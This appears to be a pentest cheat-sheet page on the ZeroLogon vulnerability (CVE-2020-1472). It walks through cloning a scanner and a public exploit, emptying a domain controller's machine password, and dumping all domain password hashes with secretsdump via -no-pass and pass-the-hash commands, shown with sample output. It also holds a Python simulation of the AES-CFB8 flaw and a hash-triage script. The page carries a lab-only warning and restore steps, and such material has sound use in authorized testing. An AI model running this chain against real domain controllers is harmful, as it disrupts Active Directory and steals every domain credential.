CVE

CVE-2020-1472 - ZeroLogon

Scanner

git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip install -r requirements.txt

Usage

$ python3 zerologon_tester.py DC2016 10.10.10.10
Performing authentication attempts...
=============================================================================
Success! DC can be fully compromised by a Zerologon attack.

Tip: the first argument is the DC's NetBIOS computer name (not its FQDN). One way to find it is to open the RDP logon screen: rdesktop -u '' IP. nmap's smb-os-discovery script also reports it.

Exploit

Warning: the exploit resets the DC's own machine account password in Active Directory to an empty string. The DC still holds its old password locally, so replication with other DCs and everything else that authenticates as the DC breaks until the original password is put back. dirkjanm's repository ships restorepassword.py for that; it takes the plain_password_hex of the $MACHINE.ACC entry that a full secretsdump of the DC (without -just-dc, authenticated with the dumped Administrator hash) prints. Run this only in a lab or with explicit authorization. The script needs a current Impacket, which the scanner's requirements.txt already installs.

Both repositories are named CVE-2020-1472, so clone the second one into its own directory:

git clone https://github.com/dirkjanm/CVE-2020-1472.git dirkjanm-CVE-2020-1472
cd dirkjanm-CVE-2020-1472
$ python3 cve-2020-1472-exploit.py DC2016 10.10.10.10
Performing authentication attempts...
=========================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!
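Why the scanner has to loop over authentication attempts, and why the exploit ends up with an empty password, as an added example that is not code from the SecuraBV scanner or from dirkjanm's exploit: it reimplements the AES-CFB8 step of MS-NRPC's ComputeNetlogonCredential with the all-zero IV Netlogon uses, and simulates the fresh session key each NetrServerAuthenticate3 attempt gets. Assumptions: the `cryptography` package provides real AES-128 (a keyed SHA-256 stand-in is used if it is missing), the session keys are constructed values rather than ones derived from a real challenge exchange, and nothing touches the network.

```python
"""Why the all-zero ClientChallenge / ClientCredential of Zerologon works.

Added example (not code from the SecuraBV scanner or dirkjanm's exploit).
It models the ComputeNetlogonCredential step of MS-NRPC: AES-128 in CFB8
mode with a fixed all-zero IV. When the first byte of AES(session_key, 0^16)
is 0x00, an all-zero plaintext encrypts to an all-zero ciphertext of any
length, because the CFB8 shift register never leaves the all-zero state.
That holds for about 1 in 256 session keys; every authentication attempt
gets a fresh server challenge and hence a fresh session key. The same key
also makes an all-zero 516-byte NL_TRUST_PASSWORD blob decrypt to a
zero-length password, which is the "changing account password to empty
string" step of the exploit.
"""
import hashlib
from typing import Optional, Tuple

try:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        """Raw AES-128 encryption of one 16-byte block."""
        enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
        return enc.update(block) + enc.finalize()

    BLOCK_CIPHER = "AES-128"
except ImportError:
    # Assumption: without the cryptography package, use a keyed SHA-256
    # stand-in so the demo runs on a bare interpreter. The structural argument
    # (all zeros iff the first keystream byte is zero) is identical.
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:16]

    BLOCK_CIPHER = "SHA-256 stand-in (cryptography not installed)"

ZERO_IV = bytes(16)        # Netlogon fixes the CFB8 IV to 16 zero bytes
TRUST_PASSWORD_LEN = 516   # NL_TRUST_PASSWORD: 512-byte buffer + 4-byte length


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: output byte = plaintext byte XOR first byte of E(key, register);
    the register then shifts left one byte and takes in the ciphertext byte."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = block_encrypt(key, bytes(register))[0] ^ p
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def cfb8_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """CFB8 decryption mirrors encryption; the register is fed ciphertext bytes."""
    register = bytearray(iv)
    out = bytearray()
    for c in ciphertext:
        out.append(block_encrypt(key, bytes(register))[0] ^ c)
        register = register[1:] + bytes([c])
    return bytes(out)


def first_keystream_byte_is_zero(session_key: bytes) -> bool:
    return block_encrypt(session_key, ZERO_IV)[0] == 0


def zero_credential_accepted(session_key: bytes) -> bool:
    """Server-side check: does ComputeNetlogonCredential(key, 8 zero bytes)
    equal the 8 zero bytes the client sent as its ClientCredential?"""
    return cfb8_encrypt(session_key, ZERO_IV, bytes(8)) == bytes(8)


def decrypted_password_length(session_key: bytes, blob: bytes) -> int:
    """NetrServerPasswordSet2 blob: 512 buffer bytes (password right-aligned)
    followed by the password length as a 4-byte little-endian integer."""
    plain = cfb8_decrypt(session_key, ZERO_IV, blob)
    return int.from_bytes(plain[512:516], "little")


def simulate_auth_attempts(trials: int) -> Tuple[int, Optional[bytes]]:
    """Model repeated NetrServerAuthenticate3 calls: each attempt yields a
    different session key (constructed deterministically here, not derived
    from a real server challenge). Returns (accepted count, first accepted key)."""
    accepted, first_key = 0, None
    for i in range(trials):
        session_key = hashlib.sha256(b"constructed-session-key-%d" % i).digest()[:16]
        if zero_credential_accepted(session_key):
            accepted += 1
            if first_key is None:
                first_key = session_key
    return accepted, first_key


if __name__ == "__main__":
    n, key = simulate_auth_attempts(2000)
    print(f"{BLOCK_CIPHER}: {n}/2000 session keys accept an all-zero credential (expect about 8)")
    if key is not None:
        print("accepting session key:", key.hex())
        print("all-zero password blob decrypts to password length",
              decrypted_password_length(key, bytes(TRUST_PASSWORD_LEN)))
```

With real AES the all-zero credential is accepted for roughly 1 in 256 session keys, so the scanner caps at 2000 attempts (a false-negative chance of about 0.04%) and the exploit stops at the first accepted attempt; the session key that accepted the credential is the one under which the all-zero password blob decodes to an empty password.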

Dump using the -no-pass flag and the DC's computer account (DC2016$, whose password is now empty; the $ is escaped for the shell)

$ secretsdump.py DC2016\$@10.10.10.10 -no-pass -just-dc
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\janedo:1110:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\tokio:1111:aad3b435b51404eeaad3b435b51404ee:b5165f7ba9b2b1a41245a1e91c48b3a9:::
[...]
[*] Cleaning up...

Or dump with the empty-password hash (LM:NT of an empty password; 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of "")

$ secretsdump.py DC2016\$@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\janedo:1110:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\tokio:1111:aad3b435b51404eeaad3b435b51404ee:b5165f7ba9b2b1a41245a1e91c48b3a9:::
[..SNIP...]
[*] Cleaning up...
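The dump above already shows something worth acting on: Administrator and three other accounts carry the same NT hash, and Guest has the empty-password hash. A small triage script for secretsdump -just-dc output, as an added example that is not part of Impacket, with SAMPLE_DUMP constructed from the lines above:

```python
"""Triage a secretsdump.py -just-dc listing: empty passwords and shared NT hashes.

Added example, not part of Impacket. SAMPLE_DUMP is constructed from the
dump shown on this page. Each credential line is account:rid:lmhash:nthash:::;
the LM field is normally the aad3b435... placeholder (no LM hash stored) and
31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM placeholder: no LM hash stored

SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
offsec.nl\\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\\janedo:1110:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\\tokio:1111:aad3b435b51404eeaad3b435b51404ee:b5165f7ba9b2b1a41245a1e91c48b3a9:::
[*] Cleaning up...
"""


class Entry(NamedTuple):
    account: str
    rid: int
    lm: str
    nt: str


def parse_dump(text: str) -> List[Entry]:
    """Keep only credential lines; skip Impacket's [*] status lines and anything
    that does not look like account:rid:32hex:32hex."""
    entries: List[Entry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        account, rid, lm, nt = parts[:4]
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            continue
        entries.append(Entry(account, int(rid), lm.lower(), nt.lower()))
    return entries


def empty_password_accounts(entries: List[Entry]) -> List[str]:
    """Accounts whose NT hash is that of the empty password."""
    return [e.account for e in entries if e.nt == EMPTY_NT]


def lm_hash_accounts(entries: List[Entry]) -> List[str]:
    """Accounts that still store a real LM hash (trivially crackable)."""
    return [e.account for e in entries if e.lm != EMPTY_LM]


def shared_nt_hashes(entries: List[Entry]) -> Dict[str, List[str]]:
    """NT hash -> accounts, for hashes used by more than one account.
    A shared hash is a shared password: one crack or pass-the-hash opens them all."""
    by_hash: Dict[str, List[str]] = defaultdict(list)
    for e in entries:
        by_hash[e.nt].append(e.account)
    return {h: accts for h, accts in by_hash.items() if len(accts) > 1}


def builtin_admin_password_reuse(entries: List[Entry]) -> List[str]:
    """Other accounts sharing the NT hash of RID 500 (the built-in Administrator)."""
    admin = next((e for e in entries if e.rid == 500), None)
    if admin is None:
        return []
    return [e.account for e in entries if e.nt == admin.nt and e.rid != 500]


if __name__ == "__main__":
    entries = parse_dump(SAMPLE_DUMP)
    print("parsed", len(entries), "accounts")
    print("empty password:", empty_password_accounts(entries))
    print("LM hash stored:", lm_hash_accounts(entries))
    for h, accts in shared_nt_hashes(entries).items():
        print("shared NT hash", h, "->", ", ".join(accts))
    print("reuse of built-in Administrator password:", builtin_admin_password_reuse(entries))
```

Feed it a real dump with `parse_dump(open("ntds.txt").read())`; the RID-500 check is the one to report first, since on this dump it shows the domain Administrator password reused on two ordinary user accounts and one admin account.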

URL list